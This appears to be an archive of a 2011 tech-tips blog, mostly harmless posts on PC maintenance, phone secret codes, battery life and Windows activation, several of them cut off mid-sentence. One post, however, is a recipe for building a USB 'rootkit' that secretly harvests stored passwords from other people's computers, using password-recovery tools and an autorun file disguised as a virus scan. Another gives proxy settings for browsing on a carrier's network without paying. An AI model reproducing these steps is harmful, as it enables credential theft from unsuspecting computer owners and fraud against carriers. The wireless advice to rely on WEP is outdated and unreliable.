Being viewed

Friday, September 16, 2011

What is Rooting?


Getting root or rooting your phone is the process of modifying the operating system that shipped with your device to grant you complete control over it.


This means you can overcome limitations that the carriers and manufacturers put on your phone, extend system functionality, and even upgrade it to a custom flavor of Android.


The name root comes from the Linux operating system world, where the most privileged user on the system (otherwise known as Administrator on Windows) is called root.


Quote:
rooting does *not* mean installing a custom ROM (a ROM is a modified, "aftermarket" OS).
Installing a ROM may require rooting first, but just rooting can be usually done in only a few minutes, keeping your stock OS otherwise completely intact.


Thursday, September 15, 2011

Problems on Your PC Solved


It’s one thing to boot up a computer
brand new from the store, and to
revel in the galactic superspeed in
which it loads. It’s another to keep it
running at that same speed,
especially after some months have passed.


An overloaded startup 
Most applications you install usually
add themselves automatically to you Start Up folder. This results in a slower startup because of the time needed to
load them all. If your computer used
to boot at the speed of light, but now moves slower than an old lady at the
zebra crossing, this might be your
problem. 


SOLVE THIS: by accessing the
MSCONFIG command through your
search bar or run application,
heading to the Startup tab at the top, and unchecking all unnecessary
programmes. Seriously, do you really need iTunes to boot whenever you
start your computer? 


Too many temporary files 


Whenever you look at webpages,
watch videos, look at photos or even
type on Microsoft Word, your
computer stores temporary files so
that it can load up faster the next time
round. These files build up over time and may slow your computer down,
especially since they’re usually
located in your OS drive. 


SOLVE THIS: By running Windows Disk
Cleanup, found in Accessories,
regularly.


A fragmented disk 


A very old school problem, but still a
very real one. Disk fragmentation
occurs when the file system can’t or
won’t allocate enough continuous
space to store a complete file. This
results in gaps within that file, and can make that file run slower than it
usually would. Sometimes, those
gaps occur when the OS deletes a file
it doesn’t need any more. (This is safe
though, your OS is smarter than you
think). 


SOLVE THIS: By running the Disk
Defragmenter, also found in
Accessories, regularly. We suggest
not using the computer whilst the
Defragmenter runs so as to minimise
more fragmentation


Programs uninstalled improperly 


What a mouthful this header is. A PC
does not work like a MAC – simply
deleting the application you don’t
want won’t cut it, and leaves behind
remaining files that may cause your
computer to slow down. 


SOLVE THIS: By always uninstalling
programs with the proper
uninstall.exe, or remove them via the
Control Panel. Go one step further to
delete leftover files from the folder
manually after uninstallation. This could include save games, 3rd party
add ons, screenshots and etc. 


A full OS disk 


Many people make the mistake of
saving everything possible into their
C:/ drive, and that usually hosts their
OS, or operating system. Once that
drive gets too full, it slows down,
thereby slowing down your entire computer’s processing speed. 


SOLVE THIS: by partitioning your drive
into C:/ and D:/ and saving your data
in D:/. The lack of strain on your OS
drive will let it run faster. You might
be pleasantly amazed at the
difference this can make. 


Background anti-viruses 


Anti-viruses are always ful, but
can sometimes do more harm than
good. Since they’re always running
and usually boot together with your
computer, they can slow down
processes considerably. Strangely enough, it’s always the ones you’ve
got to pay for that wreak the most
havoc. 


Friday, September 9, 2011

Send Free SMS To Any Local & International Mobile Number using JaxtrSMS


Sending SMS messages to any local destination may not be a big issue for most mobile users, thanks to carrier offerings and smartphone applications that allow internet-based messaging even in cross-platform scenarios. However, two limitations/issues associated with such an approach usually exist. First, in most cases, the recipient has to be a user of the same app that you’re using (e.g., Viber or TextFree), and second, the same app may not be available for one particular mobile platform, thus greatly reducing usability for the users of said OS. Enter JaxtrSMS – a free, cross-platform application that not only provides diverse platform compatibility, but also lets you send text messages to virtually any mobile number on the planet, irrespective of whether the recipient uses JaxtrSMS or not. Details to follow after the break.


Similar to other apps of its kind, JaxtrSMS utilizes an internet connection (WiFi or data both) to deliver your text messages. Where it differs from competitors is that the audience of your text message does not require having JaxtrSMS client installed on their mobile device. The messages you send would go to the normal SMS inbox, and what’s even better, they will appear from your own mobile number to avoid any confusion as to who the sender was. As of now, JaxtrSMS features fully-functional apps for iOS, Android, Blackberry, Symbian and Java-based phones, and a Windows Phone client is in the works.


Thursday, September 8, 2011

All samsung unlock and secrets code


*2767*688# = Unlocking Code
*#8999*8378# = All in one Code
*#4777*8665# = GPSR Tool
*#8999*523# = LCD Brightness
*#8999*3825523# = External Display
*#8999*377# = Errors
#*5737425# = JAVA Something{I choose 2 and it chrashed}][/b]
*#2255# = Call List


#*536961# = Java Status Code
#*536962# = Java Status Code
#*536963# = Java Status Code
#*53696# = Java Status Code


#*1200# = AFC DAC Val
#*1300# = IMEI
#*1400# = IMSI


#*2562# = ??? White for 15 secs than restarts.
#*2565# = ChAeck Blocking
#*3353# = Check Code
#*3837# = ??? White for 15 secs than restarts.
#*3849# = ??? White for 15 secs than restarts.
#*3851# = ??? White for 15 secs than restarts.
#*3876# = ??? White for 15 secs than restarts.


#*7222# = Operation Typ (Class C GSM)
#*7224# = I Got !! ERROR !!
#*7252# = Oparation Typ (Class B GPRS)
#*7271# = Multi Slot (Class 1 GPRS)
#*7274# = Multi Slot (Class 4 GPRS)
#*7276# = Dunno
#*7337# = EEPROM Reset (Unlock and Resets Wap Settings)
#*2787# = CRTP ON/OFF
#*3737# = L1 Dbg data
#*5133# = L1 Dbg data
#*7288# = GPRS Attached
#*7287# = GPRS Detached
#*7666# = SrCell Data
#*7693# = Sleep Act/DeAct (Enable or Disable the Black screen after doing nothing for a while)
#*7284# = Class : B,C or GPRS
#*2256# = Calibration Info
#*2286# = Battery Data
#*2527# = GPRS Switching (set to: class 4, class 8, class 9 or class 10)
#*2679# = Copycat feature (Activate or Deactivate)
#*3940# = External loop test 9600 bps
#*4263# = Handsfree mode (Activate or Deactivate)
#*4700# = Half Rate (Activate or Deactivate)
#*7352# = BVMC Reg value
#*8462# = Sleeptime
#*2558# = Time ON
#*3370# = EFR (Activate or Deactivate)
#*3941# = External looptest 115200 bps
#*5176# = L1 Sleep
#*7462# = SIM phase
#*7983# = Voltage/Frequenci (Activate or Deactivate)
#*7986# = Voltage (Activate or Deactivate)
#*8466# = Old time
#*2255# = Call ???
#*5187# = L1C2G trace (Activate or Deactivate)
#*5376# = ??? White for 15 secs than restarts.
#*6837# = Official Software Version
#*7524# = KCGPRS
#*7562# = LOCI GPRS
#*7638# = RLC allways open ended TBF (Activate or Deactivate)
#*7632# = Sleep mode Debug
#*7673# = Sleep mode RESET
#*2337# = Permanent Registration Beep
#*2474# = ???
#*2834# = Audio Path
#*3270# = DCS support (Activate or Deactivate)
#*3282# = Data (Activate or Deactivate)
#*3476# = EGSM (Activate or Deactivate)
#*3676# = Flash volume formated
#*4760# = GSM (Activate or Deactivate)
#*4864# = Dunno doesn't work on newer versions
#*5171# = L1P1
#*5172# = L1P2
#*5173# = L1P3
#*7326# = Accessory (I got Vibrator)
#*7683# = Sleep variable (8)
#*7762# = SMS Brearer CS (Activate or Deactivate)
#*8465# = Time in L1
#*9795# = wtls key
#*2252# = Current CAL
#*2836# = AVDDSS Management (Activate or Deactivate)
#*3877# = Dump of SPY trace
#*7728# = RSAV done# (Everything went to standart but nothing was deleted)
#*2677# = ARM State (None or Full Rate)
*#8999*636# = Have no clue what it is, i see 20 lines
*#9999# = Software version
*#8999*8376263# = HW ver, SW ver and Build Date
*#8888# = HW version
*#8377466# = Same HW/SW version thing


*#7465625# = Check the locks
*7465625*638*Code# = Enables Network lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF


*2767*3855# = E2P Full Reset
*2767*2878# = E2P Custom Reset
*2767*927# = E2P Wap Reset
*2767*226372# = E2P Camera Reset
#*6420# = MIC Off
#*6421# = MIC On
#*6422# = MIC Data
#*6428# = MIC Measurement
#*3230# = Trace enable and DCD disable
#*3231# = Trace disable and DCD enable
#*3232# = Current Mode
#7263867# = RAM Dump (On or Off)
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings
*335# = Delete all MMS Messages
*663867# = Dump Mm file
#*536961# = WAPSAR enable / HTTP disable
#*536962# = WAPSAR disable / HTTP enable
#*536963# = Serial eable / Others disable
#*53696# = Java Download Mode
#*5663351# = Wap Model ID [Your Model]
#*5663352# = Wap Model ID [SEC-SGHXXXX/1.0]
#*566335# = Wap Model ID [SEC-SGHXXXX/1.0]
*2767*66335# = Check on which model it is
*2767*7100# = SEC-SGHS100/1.0
*2767*8200# = SEC-SGHV200/1.0
*2767*7300# = SEC-SGHS300/1.0
*2767*7650# = Nokia7650/1.0
*2767*2877368# = Reset WAP Model ID 


Admin Settings, you'll see following menu : 

1. Software Version 
Displaying your Phone Firmware 
2. Pre-configuration (Code: *#27236*#) 
Option to change your Networks provider. All data will be erased 
3. Network & call settings 
Changing your network preference 
4. Internals Master key (*#7092463*#) 
Change GPS setting, Protocol, Storage,Java etc... Don't change any of this unless you know what are you doing or you'll damage your phone 
5. Feature settings 
Change your CPE setting and DRM Master reset 

Always Backup your data before accessing this Menu 
Do this on your own risks 

AND 

*#7465625# - Check SIM lock , network lock etc. 
*#1234# = Firmware version 
*#06# = IMEI 
*#1111# = FTA SW 
*#2222# = FTA H/W 
*#03# = Unique number 
*#09# = white screen 
*#0*# = the famous code for the test mode 
*#232337# = Bluetooth MAC Adress 
*#7465625# = verify simlock 
*2767*3855# = E2P Full Reset 
*2767*2878# = E2P Custom Reset 
*#0228# =battery info 
*#0289# = Melody test. 
*#0782# = Date and time 
*#0842# = vibrate test 
*#0673# = mp3 test 
*#0011# = Basic Information GSM 
*#7412359# = test radio 

Settings codes 

*#782872# = Qualcomm USB 
*#726872# = Samsung normal USB 
*#4777*8665# = GPRS Test and config menu 
*#197328640# = Root debug menu 
*#2470# = Bip camera 
*#78# = (Tests Touch Config) 

*7465625*638*Code# = Activate Network lock 
#7465625*638*Code# = Disable Network lock 
#SIMLOCK*NET*Code# 


How to extend your smartphone’s battery life


No matter what type of smartphone you have, the device can serve as your MP3 player, digital camera, gaming system, and even your TV while you're out and about — as long as you have battery power. If it seems like smarter phones are getting less life out of their batteries... you're absolutely right. Smartphones can help you get a lot done while traveling, but if you're doing a lot on one in a day, you're apt to see your screen go dark long before the sun goes down. Watching out for a few small things during your day, however, can help extend battery life on your trusty device and make sure you've got enough juice to make it all day and well into the night.

Mixed Signals
It takes extra juice for your smartphone to search for a data connection. If you're somewhere where you won't get a signal, like an airplane or subway, putting your phone in airplane mode or turning it off altogether will prevent it from draining your battery. Turning your phone on does require a bit of extra power, so it's best to save shutting it off for times when you plan to leave it off for a while, rather than something like a 20-minute subway ride to work in the morning. Thinking of it as car mode or subway mode instead of airplane mode might just be the mental trick you need! Likewise, turn off wifi when you don't need it. When it's active, your phone scans for available wifi connections constantly, which kills battery life. If you're using the wifi in a coffee shop or bookstore, remember to disable that connection when you're done to avoid draining your battery while you're on the road. Focus on the task at hand Sure, you can have your email open, search for directions to a local restaurant, watch a video on YouTube, and play Angry Birds at the same time — but chances are you're really only focused on one of those tasks. Everything you have open on your phone is using some amount of battery power. Try to focus on doing just one thing at a time on your phone, and close unnecessary applications to keep them from draining your battery. Things like your GPS and the bluetooth connection you use to connect to your hands-free device in the car gobble up a ton of battery power and are of no use to you unless you're doing a few specific tasks.


Improve Volume On Galaxy Nexus & Other Android Devices With Volume+


Most Android users, especially those with a Galaxy Nexus, often complain about the agonizingly low volume levels of their devices. If you’re among these disgruntled users, then here’s a volume enhancement solution that might please you. Meltus – the developer behind the volume enhancement tool, Volume+ – has released a beta (v1.8.1) of his app that now includes support for Galaxy Nexus and all devices running Android 4.0 Ice Cream Sandwich or higher. While the latest update mainly focuses on enhancing the volume levels on Galaxy Nexus in particular, the developer is optimistic that it should work equally effectively for all other devices, Android OS versions and custom ROMs. Details to follow.


Like its previous versions, the latest version of Volume+ helps you enhance/tweak the sound levels of your device. Be it the speaker volume, Bluetooth volume, headset volume or the in-call volume settings, the app lets you modify each as per requirement. To mention a few of the options that the app offers, you can enable the Virtual Room Effect and a personalized equalizer, along with custom maximum volume level, bass enhancer, echo level, and much more. If you don’t want to go through the hassle of tinkering with equalizer bands manually, you can simply choose to one of the many default EQ presets included within the app. The APK of the beta release is available on the developer’s website, a link to which is provided at the end of this post.


Wednesday, September 7, 2011

Nokia 5800 Tips and Tricks


1. To bring out the Shortcuts on your Screen/Desktop-> Settings/Personal/Home Screen/Home Screen Theme and select Shortcut bar, you can then select which shortcut to display if goto "Shortcuts". This will also bring out the "Track" playing being displayed when you open the Music Player.


2. Tap the Clock to bring out the Clock menu and make your alarm, alarm repeat is now built-in.


3. Tap the "General" or Date (the set Profile besides the clock) and the Profile selection menu pops out, almost similar to pressing the "Power" button in all S60, but here the Remove memory is not shown, but "Calendar" shortcut is included and the other profiles as well.


4. If you are on the Numeric Keypad, pressing the [#] key alternately will toggle the General and Silent Profiles, same as before, which means long press on zero [0] will bring out bookmarks for the Web.


5. Tapping on the displayed To do or Calendar entry will bring you immediately to that particular item.


6. Tapping the Active Icon on the Top Left (near the battery indicator) will give you shortcuts for any of the active icons.


7. Long press on the Green Call Button will still activate the Voice Command Prompt


8. Long press on the center button is similar to the Long press on the "Menu" key (the yin-yang key on most S60) which will bring out the menu for all the active applications.


9. Go to Applications/File Manager and setup "Backup" for automated backup schedule of your phone data.


10. How to update your Nokia 5800 firmware using your phone.
Presss *#0000# to display phone factory information and firmware
Now press options and select check for updates
The newest update is sent to your phone from nokia
Download and install updates.
This is done using GPRS or WIFI Connectivity.


Monday, September 5, 2011

Blackberry Secret Codes


To display the IMEI Number of the mobile Type "*", "#", "0", "6", "#" on the home screen.


Use to display the Help me option Hold "Alt" and (left) "shift", then press "H"


Use to reset using Soft method Press-and-hold "Alt", then press-and-hold (left)"shift", then press-and-hold "Del".


Use to Hard reset method ALT + Right Shift + Del = hard reset


To Displays the event logs of mobile Hold "Alt" and press "L", "G", "L", "G".


To display the source code of a web page In the Browser, hold "Alt" and press "R", "B", "V", "S".


Use to change signal strength in decibels instead of bar


Hold "Alt" and press "N", "M", "L", "L" ( Now repeat the process to reverse the effect).


iPhone Secret Codes


*#06# To display the IMEI Number of the mobile 


*225# Use to display the balance detail of postpaid number 


*#43# Use to verify if call waiting is enabled


*#61# Verify the number for unanswered calls


*#62# Verify the number for call forwarding if no service is available.


*#67# Verify the number for call forwarding if phone is busy


*#646# Use to display the minute detail of postpaid number


*777# Use to display the balance detail of prepaid number 


Thursday, September 1, 2011

Delete Virus manually without using Anti-Virus


Note: To be able to delete any of your file, make sure it was not use by other programs of processes.


1. Use Task Manager.


Since virus and other infectious files are running it's process within your computer system, you are unable to delete the virus unless you kill or end the process that using the virus or keep it running. In this section, we will have to use the task manager in your computer systems in order to kill a process. 


Press Ctrl + Alt + Del in your keyboard to access your task manager. In case you can't access your task manager it's either you are already infected by virus or other related files. You can download free extended task manager [Only Registered Users Can See LinksClick Here To Register] to replace your infected task manager.


Friday, August 12, 2011

How to Sniff Passwords Using USB Drive


As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedure to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.


Wednesday, August 3, 2011

Free Browsing and downloading


Create a new setting
Apn :- smartnet/rcomnet
Proxy :- 64.255.180.253
Port :- 80
Now open any opera handler and proxy type http 0.facebook.com and enjoy free browsing and downloading working 0 balance 
Open any handler opera
Use front query as http://rl.smp.mcore.com.www.flyproxy.com/nph-proxy.pl/0A/http/
And http server: http://rl.smp.mcore.com.server4.operamini.com
Socket server: http://rl.smp.mcore.com.server4.operamini.com:1080
Enjoy free browsing and downloading at 0.balance


Tuesday, August 2, 2011

How Windows Product Activation (WPA) Works?


Windows Product Activation or WPA is a license validation procedure introduced by Microsoft Corporation in all versions of it’s Windows operating system. WPA was first introduced in Windows XP and continues to exist in Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 as well. WPA enforces each end user to activate their copy of Windows so as to prevent unauthorized usage beyond the specific period of time until it is verified as genuine by Microsoft. How WPA really works was a closely guarded secret until GmbH analyzed WPA using a copy of Windows XP RC1 and published a paper on their findings.
In this post you will find answers to some of the most frequently asked questions about Windows Product Activation.
Why activation?
Microsoft’s intention behind the activation is to limit the usage of it’s Windows operating system to only one machine for which the retail license is issued. Any other computer which runs on the same license must be disallowed from using the software. Thus WPA demands for activation of the product within 30 days of it’s installation so as to ensure that it is genuine.
What does “Genuine Windows” means?
The copy of Windows is said to be genuine only if the product key used during the installation is genuine. It means that a given product key (retail license) must be used to install Windows only on one computer for which the license was purchased. Thus if the same key is used for the installation on another computer, then it is said to be a pirated copy.
Exactly what information is transmitted during the activation?
When you activate your copy of Windows you are transmitting an Installation ID code to the Microsoft either by phone or Internet depending on the method you choose to activate. Based on this, the Microsoft’s licensing system can determine whether or not the installed OS is genuine. If it is said to be genuine, then the system will receive the Activation ID which completes the activation process. If the activation is done via telephone then the Activation ID needs to be entered manually to complete the activation process.
What information does the Installation ID contain?
This Installation ID is a 50-digit number which is derived from the following two data.
1. Product ID – It is actually derived from the 25-digit product key (the alphanumeric value that is printed on the sticker over the Windows CD/DVD case) that is entered during the installation of the operating system. The Product ID is used to uniquely identify your copy of Windows.
2. Hardware ID – This value is derived based on the hardware configuration of your computer.
The WPA system checks the following 10 categories of the computer hardware to derive the Hardware ID:
Display Adapter
SCSI Adapter
IDE Adapter (effectively the motherboard)
Network Adapter (NIC) and its MAC Address
RAM Amount Range (i.e., 0-64mb, 64-128mb, etc.)
Processor Type
Processor Serial Number
Hard Drive Device
Hard Drive Volume Serial Number (VSN)
CD-ROM / CD-RW / DVD-ROM
Thus the Installation ID which is a combination of Product ID and Hardware ID is finally derived and sent to Microsoft during the activation process.
How is the Installation ID validated?
The Installation ID needs to be validated to confirm the authenticity of the installed copy of Windows. So after the Installation ID is received by Microsoft, it is decoded back so as to obtain the actual product key and the hardware details of the computer involved in the activation process.
The Microsoft’s system will now look to see if this is the first time the product key is being used for the activation. This happens when the user is trying to activate his Windows for the first time after purchase. If this is the case then the Installation ID is validated and the corresponding Activation ID is issued which completes the activation process.
However Microsoft system will now associate this product key with the hardware ID of the computer and stores this information on their servers. In simple words, during the first use of the product key, it is paired together with the Hardware ID and this information is stored up on the Microsoft servers.
What if a computer running a pirated copy of Windows attempts to activate?
The activation fails whenever the copy of Windows installed is not said to be genuine. This usually happens when the product key used for the installation is said to have been used earlier on a different computer. This is determined during the activation process as follows:
During the validation of the Installation ID, the Microsoft’s system checks to see if the same product key was used in any of the previous activation processes. If yes then it looks to see the Hardware ID associated with it. The computer running a pirated copy of Windows will obviously have a different hardware configuration and hence the Hardware ID will mismatch. In this case the activation process will fail.


Monday, August 1, 2011

How to Recover Deleted Files from Windows and Mac


Have you accidentally deleted your files from the Hard disk? Do you desperately want to recover them back? Well you need not panic! It is possible to recover the deleted files back from the hard disk (even after you have Shift+Deleted) provided you act as soon as you realize that the files are deleted and use the best deleted files recovery software. In this post you will find a detailed information on how to recover the deleted files from your Windows PC or Mac.
Today there exists hundreds of data recovery tools and softwares on the market which boast to recover 100% of all the deleted files back in the original condition. But in reality most of these softwares are neither effective nor capable of recovering your files back. So it is very much necessary to make the right choice of the file recovery software in order to recover deleted files back in the original condition. We recommend the following softwares to recover the deleted files
1. Stellar Phoenix Data Recovery (for Windows)
2. Stellar Phoenix Mac Data Recovery (for Mac)
Stellar Phoenix is one of the best company specializing in deleted files recovery services and solutions since 1993. Stellar’s Data Recovery Solutions encompasses a wide range of software for almost any data loss situation ranging from accidental formats to virus attacks to software malfunctions. Hence Stellar provides the best tools to recover deleted files with over 1,000,000 satisfied customers across 137 countries.
How the File Deletion Process Works?
When you delete a file from your computer (or even from the recycle bin) the file is not actually deleted. Unlike what most people think, the file is not permanantly deleted or dropped from your hard disk. Let’s take an example of a book containing 50 pages. Suppose when you delete the page 25, assume that only the entry in the index which points to the page 25 is deleted and not actually the page 25 itself. Likewise when you delete a file from your hard disk, only the pointer which points to this file is removed and not actually the file itself. This file still exists intact and is 100% possible to recover it back in the original condition. In this condition the file becomes invisible and hence appears to have deleted.
What are the Chances of Recovering my Files Back?


How to Secure a Wireless Network from Hackers?


The reason we secure a wireless network is to stop people from using the services of our network who don't have permission to utilize them. It is harder to secure a wireless network from hackers as compared to a classic wired network. This is due to the fact that a wireless network can be accessed anywhere inside the range of its antenna.
In order to secure a wireless network from hackers, we should take proper steps to save ourselves against security issues. If you don't secure a wireless network from hackers, you might end up without its service. The consequence might also include the utilization of our network to attack further networks. To secure a wireless network from hackers, you should follow these simple wireless networking tips:
1.       Strategic antenna placement:
The first thing you have to do is to position the access point's antenna in a place which restricts the range of its signal to go further than the required area. You should not put the antenna close to a window because glass can't obstruct its signals. Place it in a central location of the building.
2.       Use WEP:

WEP stands for Wireless encryption protocol.  It's a customary technique for encrypting traffic on a wireless network. You should never skip it as that will allow hackers to get instant access to the traffic over a wireless network.
3.       Change the SSID, disable the broadcast of SSID:

SSID stands for service set identifier.  It is the recognition thread utilized by the wireless access point due to which the customers are capable of starting connections. For every wireless access point arranged, select an exclusive as well as unique SSID. Also, if it's attainable, hold back the broadcast of the SSID out over the antenna. It won\t appear in the listing of offered networks, while being able to provide services as usual.
4.       Disable DHCP:

By doing this, the hackers will have to decode the TCP/IP parameters, subnet mask as well as the IP address in order to hack your wireless network.
5.       Disable or modify SNMP settings:
Change the private as well as public community settings of SNMP. You can also just disable it. Otherwise the hackers will be able to utilize SNMP to get significant info regarding your wireless network.

6.       Utilize access lists:


     For additional security of your wireless network, and if your access point support this feature, employ an             access list. An access list lets us determine precisely which machinery is permitted to attach to an access point. The access points which include the access list can employ trivial file transfer protocol (TFTP) now and then in order to download modernized lists to steer clear of hackers.


Block Internet Porn


Due to a rapid increase in the number of porn websites across the Internet, finding porn is as simple as Googling the word ‘sex’. Exposure to pornography can have a serious impact on children since it has the ability to easily distort the tender minds. If you are a parent, then you are most likely reading this because you are in search of a Porn Blocker to block Internet Porn. In fact, it is the responsibility of every parent to take every necessary step to prevent your child from being exposed to porn. In this post I will introduce you to an excellent porn blocker/porn filtering software using which you can block Internet porn and keep your computer Porn-Free. Here is the best Porn Blocker tool that I have ever used
My Porn Blocker – No1. Porn Filtering Software
My Porn Blocker main features
1. Block Porn Before it Appears – My Porn Blocker silently works in the background and stops harmful sites before they appear.


Sunday, July 31, 2011

Change the Logon Screen Background in Windows 7


How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.
1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.


Wednesday, June 29, 2011

How to Improve Your Computer’s Performance




Few things are as frus­trat­ing as deal­ing with a slow, slug­gish com­puter. When a com­puter is brand new, it works won­der­fully well. Over time, though, its per­for­mance can slowly begin to worsen. This hap­pens for a num­ber of rea­sons, but the biggest cul­prits are things like spy­ware, adware and other com­puter threats that are unwit­tingly down­loaded along with other con­tent while online. You don’t have to down­load thou­sands of MP3s, movies or other items to expe­ri­ence these prob­lems, either – nobody is immune to them. Instead of accept­ing the sit­u­a­tion, there are plenty of tech­niques and strate­gies that you can use to make it bet­ter – a few of the best ones are out­lined below.


Friday, June 17, 2011

Jailbreak Using Redsn0w 0.9.10b5


Congratulations your device can be jailbroken using Redsn0w 0.9.10b5. This is a pretty easy jailbreak method and works for Mac and Windows users. Please read all instructions carefully and


Wednesday, June 1, 2011

Basic com­puter main­te­nance



Some sim­ple main­te­nance every 2–4 weeks (depend­ing on com­puter use and pro­grams installed) will only take 10–30 min­utes, can be per­formed at any knowl­edge level and will keep your com­puter
run­ning smoothly. With this guide, and two down­loads, you will see a notice­able improve­ment. This is fairly basic and some­thing all com­puter users should do.
Remove pro­grams you no longer use or knew about:
Over time, you may have installed games or util­i­ties that you for­got about or no longer use. Why waste the space? Go to your con­trol panel, Add\Remove pro­grams (Pro­grams and Fea­tures in Vista, Pro­grams in Win­dows 7) and unin­stall any­thing you no longer use. Occa­sion­ally you will find a tool­bar or other item you were unaware was there!


Monday, May 30, 2011

How to Add a Hard Drive to Your Com­puter in 7 Steps



1: Research your machine
PCs, like the one above, are a gen­eral pur­pose tool with many parts.
Before we start the process of adding a drive, we need to do a small amount of research inside your


Eleven Tips to Keep your Com­puter Run­ning Smoothly



Here is the Tips:
1. Never, never, turn your com­puter off with the power switch until Win­dows has shut down. The one excep­tion to this rule is when your coumputer locks up and your hard drive is not


Sunday, May 29, 2011

Tips for Speed­ing Up Your PC



Few things are as frus­trat­ing as deal­ing with a slow, slug­gish com­puter. When a com­puter is brand new, it works won­der­fully well. Over time, though, its per­for­mance can slowly begin to worsen. This 
hap­pens for a num­ber of rea­sons, but the biggest cul­prits are things like spy­ware, adware and other com­puter threats that are unwit­tingly down­loaded along with other con­tent while online. You don’t have to down­load thou­sands of MP3s, movies or other items to expe­ri­ence these prob­lems, either – nobody is immune to them. Instead of accept­ing the sit­u­a­tion, there are plenty of tech­niques and strate­gies that you can use to make it bet­ter – a few of the best ones are out­lined below.


How To Trou­bleshoot a Com­puter That Won’t Turn On / NO POST / NO BOOT


It’s a dread­ful way to start a day – you press the power but­ton on your com­puter and noth­ing hap­pens. Few com­puter prob­lems are more frus­trat­ing than when your com­puter


Safety Pre­cau­tions before per­form­ing any instal­la­tion, dis­as­sem­bly or reassembly



Observe the fol­low­ing safety pre­cau­tions before per­form­ing any instal­la­tion or break/fix pro­ce­dures involv­ing dis­as­sem­bly or reassembly:


How to Fix a Stuck Pixel on an LCD Monitor


Try a solid state solu­tion like Pix­el­Tuneup (see Sources and Cita­tions). These devices pro­duce spe­cially tuned video sig­nals that elim­i­nate stuck pix­els while enhanc­ing pic­ture qual­ity, color, and con­


Saturday, May 28, 2011

Build­ing your PC 101 for Newbies



Build­ing Your Own PC 101 – A Guide For Newbies
================
|| — Intro­duc­tion — ||
================

Build My Rig” thread but most of the posts there are build sug­ges­tions and parts pric­ing. Even with a rec­om­mended build, I noticed that new­bies still have lots of ques­tions for every par­tic­u­lar com­po­nent of the PC. My goal is to teach new­bies the basics in build­ing their own first PC. Of course, for in-depth infor­ma­tion for each com­po­nent the PC will be not dis­cussed here as there are already threads here for that. This guide is for new­bies so don’t crit­i­cize it for being too sim­ple and straightforward.